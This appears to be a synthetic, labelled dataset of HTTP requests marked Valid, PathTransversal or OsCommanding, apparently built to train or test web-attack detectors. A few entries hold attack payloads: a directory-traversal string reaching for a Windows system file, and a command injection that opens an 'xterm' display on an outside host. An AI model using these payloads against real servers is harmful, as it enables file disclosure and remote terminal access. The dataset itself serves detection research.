GET /u04sOgVFqNwke7oBHd.png?vnuglt=1607&NwxHlD7=641349 HTTP/1.0
Host: www.Getesq.de
Connection: close
Accept: video/*, video/*, video/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.7, deflate;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 112.59.59.14
Cookie: tfIselectunionU_hPd=o;r5Waesi0ieni4So=\ 
Cookie2: $Version="66"
Date: Tue, 02 Feb 10 18:51:55 UTC
ETag: "9PrImSBZe4X5jEOd"
Expect: 100-continue
From: oeGnssi@vrp9apa.fr
If-Modified-Since: Thu, 06 Apr 06 05:29:45 CET
If-Unmodified-Since: Sat, 13 Mar 04 05:16:36 CET
If-Match: *
If-None-Match: "@FvT-pBhsXwzL35f"
If-Range: *
Max-Forwards: 350
MIME-Version: 4.2
Pragma: e=Oein
Proxy-Authorization: Basic dGVhWWFpZWE6ZW94MHQ=
Authorization: Digest username="aceaNat"
Range: 4706-229,9875-615,108221-
Referer: /3imavt5/grllen/faaR/asoda/8n5ggi.msf
TE: chunked;q=0.4
Trailer: If-Range
User-Agent: sssoceesEo (nEiDKQ; sun3K8bz)
UA-CPU: PowerPC
UA-Disp: 8523,9540,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 796x812
Via: 0.6 www.6ntq.png, onp/4.7 41.39.198.107
Transfer-Encoding: identity
Upgrade: xftiy/9.7, aNte/0.5, ygm5/4.7, hbosrH/1.6
Warning: 961 www.yt7P.html:06 "d9tetiiwmc" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3270
Start - Id: 45379
class: PathTransversal
PUT /ee/eaufwppinshoeE/ofreo/eWfLv/nm1OFMJs/oeihn/el2edtbl/b3ZgAtT3P5Txwue6b/reledetet2sfappthn/s0ideps2mN/ctudeariauAenuHI3/ekf.cgi? HTTP/1.0
Content-Length: 354
Content-Language: ued,osrd
Content-Encoding: deflate
Content-Location: /dzfjt6e/wtbcEetn/tnelBt/rttl1b/eZhHe.gif
Content-MD5: Q29pZGFzZXN5Y2lvcmVlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Apr 08 18:22:50 CET
Last-Modified: Mon, 08 May 06 13:26:31 GMT
Host: www.tHnon8Zd.uk
Connection: close
Accept: video/mpeg, video/mpeg;q=0.2, audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, gzip;q=0.7, compress;q=0.4, gzip, compress
Accept-Language: *
Cache-Control: hieitn='ygbiwil'
Client-ip: 219.120.83.225
Cookie: xSJbBs8BhTW=99;tl=26746;r7=:len
Cookie2: $Version="96"
Date: Wed, 16 Jun 04 21:51:03 CET
ETag: "wVrkReDNDk8Y9C5UF@3O"
Expect: 100-continue
From: R3loelSr@cnorhewh.st
If-Modified-Since: Thu, 10 Jun 04 14:12:45 UTC
If-Unmodified-Since: Thu, 19 Jun 08 02:02:44 CET
If-Match: ".8OJH7-Crdvuffy_wPn"
If-None-Match: "DF49oJ3fqIoHh-M"
If-Range: Fri, 23 Oct 09 10:17:28 UTC
Max-Forwards: 81
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM cGVsYW9ldGxJMjRyb21pc2lpYXhpbWxyZG5lZHVsc2VpN2FlSGM=
Authorization: NTLM cmR3dG9iYXVhTXRMdHVoNmVzb2dyaFZkVGxodGVIYXhlYWVsaA==
Range: 0524-
Referer: /nngl/eIsiyoo/yaeadfs/ceSd/nssEa.dll
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.1 (Windows; U; WinNT 2.6; tu-ye; rv:9.8.6) Gecko/69237643
UA-CPU: Sparc
UA-Disp: 721,775,32
UA-Color: color8
UA-Pixels: 789x027
Via: 2.3 www.vt43f.tiff
Transfer-Encoding: identity
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 851 99.105.244.225 "ewewAqyftpmnve" 
X-Forwarded-For: 42.158.87.228
X-Serial-Number: 37550564020499
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

icopyX0Mstylez@uLG=5qisvs27ci5=ewionupdater?&BXpnV.Je5Q_=18623&sHehnuDe64mo=uUG0&donaEtg0sfyTi1o=otndctasaeiehqlsh&tmaaitr=../../../../../../WINNT/autoexec.bat&onIe=Hc&vIidz=oe40awqycndmravti&smkwntMg=C@locationpeeei&AaieMrlitnr=unjhcrEt&ss5D=detriune&steea=illyreer6hl1eIo&ancunhi=16579848&iifsoprri2h=1e&gTMeEAieaisi=%2t2&va=eomSn

End - Id: 45379
Start - Id: 46025
class: PathTransversal
GET /Ze6sAisiyolettjeten/t2wOi3etihinCPn.dll?peM=vHiBPfC3Lp-h&8v5wieseNzsnseD=Gtj6&updateQj9REY1=5762726&saobae=pf&nl=eo&Jimwp-hY=05720&scvn7=dq1ha1soasoenUm&dtooal=W4ruAimwt&O5cueit=5390610437 HTTP/1.0
Host: www.ooki.uk:09159
Connection: tesdk
Accept: application/*;q=0.6, video/*, video/mpeg
Accept-Charset: iso-8859-1;q=0.4, x-mac-arabic, iso-8859-5
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 100.75.108.19
Cookie: oi=knlne8htha2;te7dobfg=5
Cookie2: $Version="6"
Date: Fri, 14 Jul 06 16:23:32 CET
ETag: W/"i@2cdKd_4ft0aj1MXmjj"
From: eircind@aorae.fr
If-Modified-Since: Wed, 04 Mar 09 01:41:33 GMT
If-Unmodified-Since: Sun, 31 Dec 06 24:28:32 CET
If-Match: "dOYhxyiF8UECtjh@2mWu"
If-None-Match: "JwkDzEhSNs8w82Gsc5X"
If-Range: Sun, 16 Mar 08 06:32:21 UTC
Max-Forwards: 17
Pragma: no-cache
Authorization: Digest realm
Referer: http://www.smcNag.net/b2eaHl/rretx/dget/dyhIoNy.txt
TE: trailers,gzip;q=0.8,gzip;q=0.4
User-Agent: /,,,/oR8nwmt/hsiui/passwd
UA-OS: Windows NT
UA-Color: color16
Via: 5.0 132.145.14.228, 7.3 www.h1nOyt.htm, HTTP/7.6 130.35.16.243
Transfer-Encoding: compress
Upgrade: SnetBt/9.0, lhEp/0.1
Warning: 793 www.tyrd.shtml "8ufoatiglFcqs3etd" "Mon, 28 Jan 08 03:54:45 UTC"
X-Forwarded-For: 20.101.217.179
----: --------------------

null

End - Id: 46025
Start - Id: 36724
class: OsCommanding
GET /roJ/2AwS45uh9reomaosti5/eea/Tslbneja7/einlRB3_-JzYZLw5K0pJ.swf?frEFwAcsLase=%250A++xterm+++++-display++++www.ieitteetma.com%3A0.0+++++&oh7hehEplshl=sWih3euknsAh&do=77064 HTTP/1.1
Host: www.87dsaWwntt.com
Connection: ixta5tEh
Accept: video/quicktime;q=0.8, image/*, audio/*
Accept-Charset: windows-1255
Accept-Encoding: deflate;q=0.5
Accept-Language: i-Irarepau;q=0.3, zjNooeya-ral9nt;q=0.7, hnsn-eno;q=0.3
Cache-Control: only-if-cached
Client-ip: 234.49.182.184
Cookie: oiseeIod9=ptoe n4l@ATe7tolr;tge2tt2eioooce=h replace'>;eu3aaAteoe=mAhttpsO;s1ecGxre8xs=29544023;sE2ocdeqirUNol=27118;faamgnbwelre=0815
Cookie2: $Version="066"
Date: Sat, 29 Dec 07 13:02:43 CET
ETag: "l9Gy9HkIv8mHHdYDo6E"
Expect: ivhahey
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sat, 02 Dec 06 07:30:30 CET
If-Unmodified-Since: Tue, 20 Sep 05 18:09:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 14
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=/r38t/bngs5.css
Range: 36-238879
Referer: /ocreuxco.php3
TE: trailers
Trailer: Cache-Control
User-Agent: ras9da (p2_PIWe; pQodqQO6Ld)
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 656x0255
Via: HTTP/5.0 196.208.230.20
Transfer-Encoding: iai5; 7htdt43t=hees
X-Forwarded-For: 18.24.168.27
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36724
Start - Id: 25515
class: Valid
GET /etzesat/tzoA/dSG7GL@vGIlg/9dl5nAksqK@kdPxn/e5c5aSjlmahnjoaeja/NldatuA0mreete9Fin6d/sf/0RB7ThCnDE/fSTisuocg.html?eEbcorItqOlN=2R8&ievldnelAeE=57&dd=iioiHcloideAft&asbcunshsynid=4120989&t1b0sh9g=hhnmlnl7nr1ui&XXXXOA3khP7=2&ao=6554425 HTTP/1.0
Host: 186.254.157.71
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 39.22.35.117
Cookie: ahoYeg6Esersh2=12456;3%uoqaw8=eimgd
Cookie2: $Version="8"
Date: Tue, 16 Oct 07 19:09:46 CET
ETag: W/"2dE0F5cVq.j8E7O5Izr"
Expect: 100-continue
From: hhexy@ieecah.it
If-Modified-Since: Wed, 21 May 08 17:29:31 UTC
If-Unmodified-Since: Sat, 24 Apr 04 09:16:31 GMT
If-Match: *
If-None-Match: "-VgQLaA8v_-UI4lMSq"
If-Range: *
Max-Forwards: 9453
MIME-Version: 1.0
Pragma: 0odtpoo='A7xmjNrd'
Proxy-Authorization: Basic bm9yZzFyOm93c28=
Authorization: Basic MHJkczp0dDFM
Range: 6-,950-89
Referer: http://ac9o.uk/rhCf.html
TE: gzip
Trailer: Date
User-Agent: nqiiefce (cryEx63sh; hYddOy)
UA-CPU: MIPS
UA-Disp: 0020,943,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5796x493
Via: hc5so/3.3 www.eizgr.htm:6, HTTP/6.3 www.93tele.jpeg
Transfer-Encoding: deflate
Upgrade: ftdTss/7.6
Warning: 857 81.72.64.201:0289 "eelt7eziiiiloger" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 33645142012185435
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25515
Start - Id: 9631
class: Valid
GET /etee14/eFQ6ZC5-zUkAoItxlwx/t6_MpQrzXcter.Y/stsoscmSostfigrl6iiw/nT9MnS3hCvaKoU/tp7ztrpItfs7/Z9link4fZ28xh/X8AnYBmyFfROEw/naiiueCo1tbcr8w/ddK0-lafMbg7WuQJQg/iybxpe6l9ereosnatchi.jpeg?S7YdocumentnstdinN1CU%u9=ups1a%5C&dnaftiuaotOtM=1&ra0onin=oaa&zsea7t9ferwrden=12516&style_U7Eimgzf=iNmQHVtC&nytr6Gs0jkyf5=bia4ptmocha%3Bed2f%5DekN&loEeebnoj=sg8f&eaSiebOdfmt=0014976&5IqYweuTumO=oczeaDTieFhuea&censnramn=8a76aconnectbofk6i+Bo&O5mD0=780&HIOznEM2j8=dhso%29%5Cath8ds HTTP/1.0
Host: www.taAhazt.org:6
Connection: close
Accept: audio/*;q=0.5, application/*;q=0.7
Accept-Charset: windows-1251;q=0.5, x-mac-korean, iso-8859-3, koi8;q=0.9, euc-jp;q=0.4
Accept-Encoding: compress;q=0.7
Accept-Language: *;q=0.0
Cache-Control: min-fresh=01446
Client-ip: 42.8.19.205
Cookie: servicesOeTWnph-=ehreplacelee$urs%2qwane ;epdQha=uVeBSedrS9m;s1ythiseoxrtn=gSVybioro12
Cookie2: $Version="9"
Date: Sun, 19 Mar 06 06:49:59 GMT
ETag: "wC5C@@3slKE6fF2HXx"
Expect: n66hah
From: yiJqeaa@9hauhsGph.fr
If-Modified-Since: Sun, 30 Sep 07 21:10:57 GMT
If-Unmodified-Since: Thu, 23 Apr 09 23:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: "m.sQzXrnIgcLZC@Fhl"
Max-Forwards: 2
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: jyhe b0tkvyos=lioe3l1
Authorization: Basic dEdzbVczOm5Fbk90YW9h
Range: -11893
Referer: http://www.XIasnea.ch/ttaidst2.gz
TE: trailers,trailers
Trailer: Host
User-Agent: m1euieoee/7.3
UA-CPU: PowerPC
UA-Disp: 8659,744,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9491x5662
Via: 7.4 www.ayoej.css
Transfer-Encoding: identity
Upgrade: sNh/6.5, ssodh/7.1, jrin/2.9, wHoee/3.7, reoo9/6.9
Warning: 606 2.209.145.26 "hnYlolrdop5ncaorw1" "Wed, 04 May 05 03:28:44 GMT"
X-Forwarded-For: 34.115.88.196
X-Serial-Number: 04486
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9631
Start - Id: 12854
class: Valid
GET /ayia1ehstn4/nqe4CE4547ZSSVKN/6ltN/vpTihwryp2ae/ZqimgtmpokH4xG9./jioin/ojdAadDqT/5i/e0MbbgG/T@W.execz5/pEOzR.tiff? HTTP/1.0
Host: 88.6.170.45
Connection: hds9Ygp
Accept: */*
Accept-Charset: iso-8859-2
Accept-Encoding: deflate;q=0.1, identity;q=0.8, deflate, identity, gzip
Accept-Language: t4-nralmsub;q=0.8, f7uiMZyd-ntst7jt;q=0.1, ntleeob-jssdu;q=0.2, hfc0s3E-h;q=0.7, eyho-ug;q=0.4
Cache-Control: max-stale
Client-ip: 184.111.50.185
Cookie: t9=oninr8ciser1
Cookie2: $Version="98"
Date: Mon, 26 Feb 07 01:37:39 UTC
ETag: "WU-5gxwcCX1t42G2qlC"
Expect: 100-continue
From: iirE@eyRmP2.biz
If-Modified-Since: Sun, 11 Oct 09 11:36:52 GMT
If-Unmodified-Since: Mon, 29 Nov 04 15:51:47 CET
If-Match: *
If-None-Match: *
If-Range: "pUXiYpH3If.YPIoT"
Max-Forwards: 0
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic ZG5yVzphZGxldHk=
Authorization: NTLM eXNlNVNwZ25sNHVidHZyb3N0TnQ4YWRoamlpcWhlbWlpb2hldDBhcmlpbw==
Range: 98709-37276,-196
Referer: http://Dnju.com/io0xin/uUetnAn.msf
TE: trailers,trailers,chunked;q=0.0
Trailer: Host
User-Agent: Mozilla/4.3 (compatible; Azith; Win98; npFTyod; bE3w)
UA-CPU: Sparc
UA-Disp: 662,803,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0320x5347
Via: FTP/1.1 www.Spissoi.gif, HTTP/8.6 132.236.131.185
Transfer-Encoding: compress
Upgrade: zoadt/1.0
Warning: 241 www.rpshelf.shtml "ImulXdfh" 
X-Forwarded-For: 91.199.65.166
X-Serial-Number: 267270605384116
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12854
Start - Id: 20450
class: Valid
GET /rpDkB/OQFstyleKkuWH-0HgAR.png? HTTP/1.1
Host: www.tX0ja.st
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-874;q=0.4, utf-7, windows-1250, x-mac-hebrew
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 83.158.227.172
Cookie: tOpri2e4smt= c;DhtaccesCKcmdA0dIph=iVo7EdyH
Cookie2: $Version="3"
Date: Wed, 22 Nov 06 23:48:39 GMT
ETag: W/"J5a8UxTuwAtRopVlERn"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Sat, 27 Aug 05 12:54:26 UTC
If-Unmodified-Since: Fri, 04 Feb 05 06:09:41 CET
If-Match: "ulzl08OcQPNjlpOGd"
If-None-Match: "2hQd.SWSqlMYVgv8HnO"
If-Range: *
Max-Forwards: 231
MIME-Version: 0.1
Pragma: Hsete='te'
Proxy-Authorization: Basic aWJQamVScjpybmVncw==
Authorization: Basic ZW5IZWU6ZHJTd2Vu
Range: -896,61-724379,-171
Referer: http://www.tslteDA.org/3usatt/IeEpeit.sh
TE: trailers,trailers,deflate;q=0.3
Trailer: Authorization
User-Agent: npieae (s6Roxv_ndc; sqVDOvwdnh; mdaSj2X4)
UA-CPU: 68000
UA-Disp: 635,2020,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2799x9300
Via: ttje/8.5 www.3Gsu.png
Transfer-Encoding: identity
Upgrade: zosEe/8.8, bsan/1.2, a3f/0.3, ioths/1.6, ill/1.5
Warning: 507 147.216.24.122 "tsXo1ea" "Wed, 04 Jun 08 11:36:12 UTC"
X-Forwarded-For: 1.118.222.38
X-Serial-Number: 4599369837031891295
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20450
Start - Id: 9750
class: Valid
GET /NPH8ESm71QQgsystemW./E9C-O5Ocdrop5L-y/r4earStloxxpdhVoe.css?me7nbsdxagduc=s-7IW8v&8rcwdndtnaaytr5=%7Cus&Y.eQTDY4mgf=0c3EpasnshtcoO34&CnJKPvc=lMrnL6V5WIgp&eettINeaabcu=ssjrdsctfEol6&qZCbodyinputp2klDz=a%40R50&UclCSTJbOd-=do&fOeSosh5l=00&dxeNthftgr1Mpem=n5O&xihttp4WOOK68lj=d.VcoJ5riVfd&scwelnsnsar=8028931&ptfe8pst=470&o97bEfwitetp=78&ieoi8=rmrvae&weahoshak=82786684 HTTP/1.1
Host: www.87sv5.fr:80
Connection: vogmwSz
Accept: application/x-tar
Accept-Charset: x-mac-hebrew;q=0.4, windows-1257, isiri-3342;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 63.10.196.4
Cookie: i4rstrigdttyt0b=y9aMjmnexecli%hUoiet;aurterst=685918179;osoanKT=6
Cookie2: $Version="013"
Date: Tue, 26 Jun 07 08:07:25 GMT
ETag: W/"m.qJ80FLKI2Djj8@Z6O"
Expect: 100-continue
From: eLae2iyg@i6ilvqwa.ch
If-Modified-Since: Sun, 18 Sep 05 04:44:13 CET
If-Unmodified-Since: Mon, 15 Dec 08 24:32:45 UTC
If-Match: "BDFwfTzvehUb0Z.w.MPB"
If-None-Match: *
If-Range: "UDh7v8AKgFwbNDtoQiK"
Max-Forwards: 424
MIME-Version: 8.6
Pragma: a='tyF'
Proxy-Authorization: tonFs fnhRm=aeofnoj
Authorization: Basic YXRzOGRvOmxoc2k=
Range: 2-18,-5
Referer: http://ld77pi.it/wyol.asmx
TE: trailers,trailers,gzip
Trailer: Referer
User-Agent: Mozilla/3.0 (Windows; U; WinNT 1.2; za-js; rv:0.4.1) Gecko/21078296
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6817x021
Via: HTTP/8.1 195.143.175.30, HTTP/4.8 www.gmreZr.jpg, 4.1 www.Gtdnn6x.shtml
Transfer-Encoding: gzip
Upgrade: amceib/4.5, rmeBe/8.4, muaagw/6.1
Warning: 953 180.113.100.133 "os75rearnh" "Sun, 27 Apr 08 19:25:31 CET"
X-Forwarded-For: 199.75.6.60
X-Serial-Number: 937322
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9750
Start - Id: 6146
class: Valid
POST /kS/re/-mDgKLXjAtyexec/WbreuodiA/tictcrnifhjvdrd/mrJ5h_3Y2/miroio/gsjou3t.b2.3/oIaFzjpC0W/et@aNbew-6fyvrf.gif? HTTP/1.1
Content-Length: 67
Content-Language: wel
Content-Encoding: gzip
Content-Location: /fnV1ee/ni0ity2.cgi
Content-MD5: aG9kbDFFYml2N25UYWFzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Mar 10 23:45:14 UTC
Last-Modified: Wed, 06 Jul 05 14:30:36 UTC
Host: 168.215.108.208
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: b-oi2stnpq;q=0.3, rnyniu-h
Cache-Control: max-age=4
Client-ip: 213.36.197.19
Cookie: mef0=5KJ0gjNhZj;Evffmelioo=n5;eussIg=rejhu;iusHXogixt2=nana
Cookie2: $Version="52"
Date: Sun, 11 Nov 07 05:08:14 UTC
ETag: "-1JU0w8x7nVeD3F"
Expect: gbEoaHe=mbo4l
From: arnac8@nERnnE.be
If-Modified-Since: Mon, 26 Apr 10 01:14:28 CET
If-Unmodified-Since: Sun, 16 Sep 07 21:09:57 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 11 May 09 12:07:09 GMT
Max-Forwards: 40
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="atR3"
Authorization: ettpre Oeat=7dtf2s
Range: 611533-,1458-075
Referer: /styue/sAey/poi8.nsf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/1.3 (compatible; MSIE 6.3; SunOS sun4u; hdnnri)
UA-CPU: PowerPC
UA-Disp: 8680,157,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0700x717
Via: HTTP/8.5 177.106.151.10
Transfer-Encoding: deflate
Upgrade: pnds/8.6
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 175.130.165.6
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

reSiisEhsea=so7zZ&mdohoOwra=969446&uaoNner=himxneYhge&utcueeOt=iYgn

End - Id: 6146
Start - Id: 11771
class: Valid
GET /e_FcCHOwZftpun/yNW92.htm? HTTP/1.1
Host: 33.40.145.240
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=25525
Client-ip: 51.103.184.132
Cookie: tai5smusomR=;\exterm
Cookie2: $Version="7"
Date: Mon, 20 Jul 09 02:44:06 GMT
ETag: "_Xa@6Bpb60Qnyc8k"
Expect: dxtgy=tewr;dph9ulHh
From: KeaS@rpHi9.it
If-Modified-Since: Wed, 28 May 08 19:22:49 CET
If-Unmodified-Since: Tue, 19 Feb 08 01:49:40 CET
If-Match: "NSciXNgENoH4Pefnbk_m"
If-None-Match: *
If-Range: Mon, 11 Sep 06 21:29:36 CET
Max-Forwards: 613
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM ZGRMazhodGRqb2Fka2FBcnJzMGFyYW5yc2hIbjVkZXR1aXB2Y3ZlcXQ=
Authorization: NTLM ZGFoY0FtbmF2bG5nZzJheHFhZ2x0b2hsaTdwc2FOZVNlZ0Nm
Range: 9-947069
Referer: /tyeiiao/csis/qlozA/Enlfee.sh
TE: gzip,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/6.1 (compatible; MSIE 9.9; Linux i386; Jhrofmir)
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 883x0271
Via: FTP/0.1 www.i7Ocn3.shtml, HTTP/7.2 www.eoIdIr4.tiff
Transfer-Encoding: deflate
Upgrade: CeaT/1.3, qaai/6.4, iJd4/5.3
Warning: 864 www.odc5ns.htm "tlwt73eSeidle" "Sat, 17 Jan 04 09:21:50 GMT"
X-Forwarded-For: 92.235.100.67
X-Serial-Number: 74383585408029434744
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11771
Start - Id: 5481
class: Valid
POST /tu91V/9shseossdeju6cffnui/g7OtzD/o1webearLon39auu/eMreJ/zbl-H-Rd08uoXJMz1/hcofeeaiheusrct/e6VpkqcVHq9TzRs6_aq/oemqtf/wbgsound1tmpdAKSxmIzd3.shtml? HTTP/1.1
Content-Length: 164
Content-Language: 8aiqa,nielbenT,iwoa
Content-Encoding: gzip
Content-Location: http://www.seimpM.gov/joh5m.ace
Content-MD5: Ujh1cXRubXhhdXRUb2Vvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Nov 06 24:50:25 GMT
Last-Modified: Sat, 28 Oct 06 04:55:54 GMT
Host: www.Iynp.de
Connection: close
Accept: */*
Accept-Charset: x-mac-greek, x-mac-hebrew, hz-gb-2312, x-mac-ce;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=99
Client-ip: 13.15.222.251
Cookie: suaei=dexd3o0c0ro;sadRcrtOpyhMir=NbiNltr;zstw1riwnu=poo;meeshchaobyn=anprocessing-instructionos;i8dii4lt=r7aqeDXzSwwd;dTiclAr5ZrutoOs=8193555324
Cookie2: $Version="1"
Date: Thu, 16 Aug 07 09:00:43 UTC
ETag: W/"CuZ@7VV1doTh2wOJdDh"
Expect: 100-continue
From: a2re@neunel.uk
If-Modified-Since: Thu, 24 May 07 07:15:59 UTC
If-Unmodified-Since: Fri, 19 May 06 15:00:52 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 17 Mar 05 13:30:24 GMT
Max-Forwards: 7442
MIME-Version: 6.9
Pragma: lctsd=sootf
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="hpbrao"
Range: -1,49-10
Referer: /vhijnnsi/pzu8wne/mnhbNe/edze.asmx
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.3 (X11; U; Linux i586 7.5; np-o3; rv:5.4.5) Gecko/53748683
UA-CPU: StrongARM
UA-Disp: 4823,2898,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2642x571
Via: 7.8 190.91.135.206:72686, 1.2 137.174.143.38
Transfer-Encoding: compress
Upgrade: aowete/2.3, cLo43/0.3
Warning: 081 www.m8rn1rmo.shtml:31303 "6h7tteywuheldre" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 56905023798190
----: ---------------------
~~~~~: ~~~~~~~~~~~

Z-604=ig&e4iitmpa=o annpasswdh no6sau s&NTSEWF7=h3nro4Eenysablh&ezuhsOestPhnE=nhcBe1suooes&gNhhkS6ftd=wa&r2ts=di?5pe&oresbo=trlhr5dtaqgItbcAo&fyt2iaboojr=zzoAieMa

End - Id: 5481
Start - Id: 32453
class: Valid
GET /3ColFVQ7Q8/yoDFuHnqzmUO0vp9/crwOS7hYma/Eawnql/cts_document30ahUDUi@/kkHPNiP7tMxY/nie5aa.nsf? HTTP/1.1
Host: www.omha.st
Connection: uoEhia
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 145.133.185.131
Cookie: Tsshutdown5= oiiexecioyUmu;beterara=a8R7a4stRpab5stt6;nzfEg=znyO<uaefes;IlOhnrt=DntnAntgnegaAf
Cookie2: $Version="33"
Date: Tue, 02 Sep 08 07:59:30 CET
ETag: "L@hxhH-RK5Ql4dG7"
Expect: qoopza
From: euedYotd@rhStwtetaa.biz
If-Modified-Since: Fri, 17 Apr 09 01:57:48 GMT
If-Unmodified-Since: Sun, 02 Aug 09 07:15:18 GMT
If-Match: "T1knbAeKQAZsPBa2I1"
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic bGVpRjpwZWFoZThvcw==
Authorization: Basic dGl0ODV0OnRxSTRhZnQ=
Range: -8,-09,-81094
Referer: /raEele/crzd/mt4bg/a2isnoa.asp
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: Mozilla/4.2 (compatible; MSIE 0.6; Open BSD i386; rut2Ea; trtlx4raek)
UA-CPU: 68000
UA-Disp: 724,9778,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2914x4249
Via: 0.8 www.heeGnka.css:339
Transfer-Encoding: gzip
Upgrade: oyi/6.4, eAjae/0.5, yst/5.6, zs8c/0.9
Warning: 120 www.torwc6.shtml "mpfdt" 
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 498430516036969
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32453
Start - Id: 16655
class: Valid
GET /7bPW@aWqLKSZ.jpg?null_A8vbscriptz=70&tstUexrKiSof6=oeesm&sseeEnysesjnzfs=iwfrbabwuwB&4l7tsoxelaeedrO=4641304&qwrayiaI=7&6ae6ue9retlno=mlrscriptchild&GAq9autoexec=396158&3taehehsef=ps&rNimgbhUu=%3BL%5C%242r%3A%27ci&iah=bWBE02cKu6&UCShAR7bgJ=12628&Epa=lr_c3s1IdX&aocEd5nrc=Tcopydn&ealelmd=gocnLae&iallXl=19572 HTTP/1.1
Host: 240.171.204.73
Connection: close
Accept: video/*, audio/basic;q=0.8, video/*
Accept-Charset: iso-8859-9;q=0.5, windows-1251;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.6
Cache-Control: max-age=651
Client-ip: 255.93.106.203
Cookie: xuoage8=Qxaengersd4dt;oraibonb=es-evsscy;sstyleXX=anls;eoohEin=c a;rgw=eeaii4sinaaekc04y;osnroetdr=tE8gahro4dq
Cookie2: $Version="13"
Date: Sat, 13 May 06 03:21:50 UTC
ETag: W/"H6TEpx9jHT7U1nb8jS26"
Expect: 100-continue
From: 7beimH@indn.it
If-Modified-Since: Sun, 17 Sep 06 06:54:53 CET
If-Unmodified-Since: Thu, 06 Mar 08 04:38:13 CET
If-Match: *
If-None-Match: "gP7HElrwBsLM.Ho"
If-Range: Sat, 29 Sep 07 06:46:47 CET
Max-Forwards: 42
MIME-Version: 3.7
Pragma: 1=ldp
Proxy-Authorization: NTLM dWV1ZXNpcmFzYmxsYjN0dnR6d21SdXRsZHRpaWV0bGFobGF1Z29x
Authorization: de8xH Amxs5=Berma
Range: -085,-96748
Referer: /sNoiuCz/sqi2i/yehamn.dll
TE: chunked;q=0.6
Trailer: Warning
User-Agent: iD6m2H http://www.i0ta.net
